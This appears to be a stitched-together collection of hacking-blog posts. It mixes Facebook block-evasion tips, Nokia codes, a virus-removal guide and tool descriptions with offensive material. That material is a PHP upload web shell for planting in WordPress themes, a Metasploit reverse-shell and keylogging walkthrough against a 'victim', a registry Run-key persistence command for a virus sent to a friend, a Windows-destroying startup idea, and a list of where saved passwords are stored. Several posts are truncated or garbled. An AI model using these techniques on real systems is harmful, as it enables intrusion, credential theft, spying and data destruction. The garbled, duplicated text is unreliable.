Send Facebook Friend Requests even when you got blocked..!!!! :D

Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friend make misuse of that thing.

However, sometimes you may even get blocked when you send friend request to known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even if you are blocked.

Ok lets start 

1. open this link - https://www.facebook.com/?sk=ff

2. then click on other tools

If you don’t know the easiest way to make contact file then follow these steps.

• Open new text document (.txt) in notepad.
• Add all the email addresses separated by a comma ( , ).
• Now save that file with the extension .vcf
• Now this is your contact file.
• Now Upload this file to Facebook. and you will be prompted to send friend request.

 Click “OK”and You’re done

 Simple yet effective! Your friend request would be sent to desired people.

If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent.. :D ;) 

>>$)R!113x<<

How to Upload your shell on wordpress websites!!

How to Upload your shell on wordpress websites   Just follow the Steps given below:    

1- Login to wordpress. 

Goto site.com http://www.site.com/wp-admin/

2- see "editor" option in "apprearance" and click on editor

3-Now see Right slider bar and click on any option like 404.php or comments.php

4- Edit that code and paste this code there

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.devilscafe.in</b><br><br>'; }  else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

You can paste your shell code too..

5-Now click on update file, and see theme name.
Now Goto http://www.site.com/wp-content/themes/themename/yourshellfile.php 

You will get nw a upload option there, select your shell and upload it and
to vew it goto same directory ..

example: http://www.site.com/wp-content/themes/themename/yourshell.php

Now change index.php in public_html for using shell :D :D



HACKEDOFF!!!

Destroying Windows

 WINDESTROYY..

 

Here, its a simple code for destroying any WINDOWS.. 

You can simply do it by deleting the NTLDR file from your system.. Bt its nt so easy to do so.. 

Herez the code to be written in batch file.. and put it in the startup folder. 
So the next you'll switch the windows, it'll be destroyed.. 

All Saved Password Location

Google Chrome:

Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location


XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default


Trillian:

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently.

Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere there.

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal



MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[AccountName]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. They a set of Win API functions (Credential API’s) to store its’ security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.



Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]



Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]



Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.



Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)



Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.



AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



Filezilla:

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this



Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.



Internet Explorer 7.00 – 8.00:

The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.



Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile



Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 98/2000:

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.



ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.



Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

 

How to find or remove the Virus ?

How to find or remove the Virus ?

If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.

It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.
For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, “an unprotected [Windows] computer will become owned by a bot within 14 minutes.”

Today’s viruses, worms, and so-called bots–which turn your PC into a zombie that does the hacker’s bidding (such as mass-mailing spam)–aren’t going to announce their presence. Real viruses aren’t like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you’re not well protected.

Is Your PC “Owned?”
I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program’s presence. People who write commercial software put icons all over your desktop. Who’s going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there’s nothing that you need to worry about, include:

* An automated e-mail telling you that you’re sending out infected mail. E-mail viruses and worms typically come from faked addresses.

* A frantic note from a friend saying they’ve been infected, and therefore so have you. This is likely a hoax. It’s especially suspicious if the note tells you the virus can’t be detected but you can get rid of it by deleting one simple file. Don’t be fooled–and don’t delete that file.

I’m not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.



Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you’re not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check “Show icon in notification area when connected,” and click OK.

If you’re interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you’ll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type
“services.msc” in the box, and press Enter. You’ll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing “msconfig” in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won’t run–or if your security software won’t run–that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.



What to Do Next
Once you’re fairly sure your system is infected, don’t panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don’t have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There’s McAfee FreeScan, Symantec Security Check, and Trend Micro’s HouseCall. If one doesn’t find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you’re done, buy or download a real antivirus program.

* If you have antivirus software, but it isn’t active, get offline, unplug wires– whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.

* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses–if manual removal is possible–or a free removal tool if it isn’t. Check out GriSOFT’s Virus Encyclopedia, Eset’s Virus Descriptions, McAffee’s Virus Glossary, Symantec’s Virus Encyclopedia, or Trend Micro’s Virus Encyclopedia.


A Microgram of Prevention
Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer’s security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro’s PC-Cillin, which you can buy for $50.

Don’t want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn’t worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it’s right there on your Start Menu) to make sure you’re getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say “Service Pack 2.”


Here are a few more pointers for a virus-free life:
* Be careful with e-mail. Set your e-mail software security settings to high. Don’t open messages with generic-sounding subjects that don’t apply specifically to you from people you don’t know. Don’t open an attachment unless you’re expecting it.

* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.

* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research’s Web site and run the free ShieldsUP test to see your ports’ status. If some ports show up as closed–or worse yet, open–check your router’s documentation to find out how to hide them.







Hope you like this post if you liked it do share this with your friends .

CMD in single click :)

Open CMD with right click

If you don’t already have a quick launch icon or a hotkey set to open a command prompt, there’s really quick trick that you can do on any Windows 7 or Vista computer to open up a command prompt without having to navigate the menu.
Just hold down the Shift key and right-click on the desktop…

And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.

Of course you can always right-click on any folder icon in the system while holding down the shift key:

Or inside any folder:

Exploitation

Exploiting Windows 7 Remote Computer Using Metasploit Framework

 Today I’ll tell u how to exploit any remote machine of Windows 7..

The steps are as follows..

First of all , start backtrack 5 and type “startx” to start the GUI mode:
root@bt:~#startx
The by default username and password is
Username: root
Pass: toor
To know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig

Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole

 

 

 Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window

 

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything.
You will get like this:

 Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

 

 

Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT => 4444

 All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process

 meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv

 Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes…

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.


So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.


So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up.

1. Open a Notepad file
2. Write down the following command
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe
3. Now save the notepad file with any name say DESTROY but extension should be bat. Means we will have to create a batch file eg: DESTROY.bat
4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.
5. Now the impact of the virus will also be visible after the restart of the system.

Zenmap

Working Of Zenmap (Network Scanning Tool)

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scans can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.


CHOSEN SETUP

As Zenmap runs on a windows/Linux so i chose the following setup :
 Windows  OS – Windows 7 installed on a system
 Version- Zenmap 6 (http://nmap.org/dist/nmap-6.00-setup.exe)

Scanning
Begin Zenmap by typing zenmap in a terminal or by clicking the Zenmap icon in the desktop environment.
Firstly, select the Target. Target could be any domain name or the IP Address, so right now my target is  10.0.0.2.

Profile:

 

Profile combo box. Profiles exist for several common scans. After selecting a profile the Nmap command line associated with it is displayed on the screen. Of course, it is possible to edit these profiles or create new ones.
It is also possible to type in an Nmap command and have it executed without using a profile. Just type in the command and press return or click “Scan”.

 In Zenmap there are 10 Types of Profile :
a.  INTENSE SCAN
Command = nmap -T4 -A 10.0.0.2
Description  = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (–traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.

SCAN RESULT TABS
Each scan window contains five tabs which each display different aspects of the scan results. They are:
a) Nmap Output
b) Ports / Hosts
c) Topology
d) Host Details

Each of these are discussed in this section:
NMAP OUTPUT
The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar Nmap terminal output.

PORT/HOSTS
When a service is selected, the “Ports / Hosts” tab shows all the hosts which have that port open or filtered. This is a good way to quickly answer the question “What computers are running HTTP?”

 

TOPOLOGY

The “Topology” tab is an interactive view of the connections between hosts in a network.

HOST DETAILS
The “Host Details” tab breaks all the information about a single host into a hierarchical display. Shown are the host’s names and addresses, its state (up or down), and the number and status of scanned ports. The host’s uptime, operating system, OS icon. When no exact OS match is found, the closest matches are displayed.

Web Scarab

Web Scarab: Introduction

WebScarab is a framework for analyzing web application which is written in Java, so that’s why it is portable to many platforms. WebScarab communicates by using HTTP and HTTPS protocols. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.


WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

 

Features:

• Fragments - Extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins.

• Proxy – Observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.

• Manual Intercept - Allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.

• BeanShell – Allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.

• Reveal Hidden Fields – Sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.

• Bandwidth Simulator – Allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.

• Spider - Identifies new URLs on the target site, and fetches them on command.

• Manual Request – Allows editing and replay of previous requests, or creation of entirely new requests.

• SessionID Analysis – Collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.

• Scripted – Operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.

• Parameter Fuzzer – Performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.

• Search – Allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.

• Compare - Calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is “the number of edits required to transform one document into another”. For performance reasons, edits are calculated using word tokens, rather than byte by byte.

• SOAP – There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server.
  NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is also a free tool.

• Extensions – Automates checks for files that were mistakenly left in web server’s root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.

• XSS/CRLF – Passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

 

Startup Virus

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.


So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up:


1. Open a Notepad file.

2. Write down the following command.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat

4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.

5. Now the impact of the virus will also be visible after the restart of the system.

 

Hack Nokia

Nokia Mobile Phone HACK Codes

1.  Imagine ur cell battery is very low, u r expecting an important call and u don’t have a charger.
     Nokia instrument comes with a reserve battery. To activate, key is “*3370#”
     Ur cell will restart with this reserve and ur instrument will show a 50% increase in battery.
      This reserve will get charged when u charge ur cell next time.

     *3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx 5%
     #3370# Deactivate Enhanced Full Rate Codec( EFR)
     *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
    *#4720# Deactivate Half Rate Codec

2.  *#0000# Displays your phones software version,
      1st Line :  Software Version,
      2nd Line : Software Release Date,
      3rd Line : Compression Type

3.  *#9999# Phones software version if *#0000# does not work.

4.  *#06# For checking the International Mobile Equipment Identity (IMEI Number).

5.  #pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

6.  #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

7.  #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

8.  #pw+1234567890+4# SIM Card Lock Status.(use the “*” button to obtain the “p,w” and “+” symbols).

9.  *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone).

10.  *#21# Allows you to check the number that “All Calls” are diverted to.

11.  *#2640# Displays security code in use. 

12.  *#30# Lets you see the private number.

13.  *#43# Allows you to check the “Call Waiting” status of your phone.

14.  *#61# Allows you to check the number that “On No Reply” calls are diverted to.

15.  *#62# Allows you to check the number that “Divert If Unreachable(no service)” calls are diverted to.

16.  *#67# Allows you to check the number that “On Busy Calls” are diverted to.

17.  *#67705646# removes operator logo on 3310 & 3330

18.  *#73# Reset phone timers and game scores

19.  *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible

20.  *#7760# Manufactures code

21.  *#7780# Restore factory settings

22.  *#8110# Software version for the nokia 8110

23.  *#92702689# (to remember *#WARRANTY#)
      Displays -
      1. Serial Number,
      2.Date Made
      3.Purchase Date,
      4.Date of last repair (0000 for no repairs),
      5.Transfer User Data.
      To exit this mode -you need to switch your phone off then on again

24.  *#94870345123456789# Deactivate the PWM-Mem

25.  **21*number# Turn on “All Calls” diverting to the phone number entered

26.  **61*number# Turn on “No Reply” diverting to the phone number entered

27.  **67*number# Turn on “On Busy” diverting to the phone number entered

  Each command is prefixed with either one or two * or # characters as follows:
   ** Register and Activate
   * Activate  
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button

Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key – this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).


Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©

Display IMEI *#06#

Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©

Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate  **67*number#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring

Activate barring all outgoing calls (see Security to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©
Check status of barring all incoming calls *#353#©

Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)

CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one’s own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©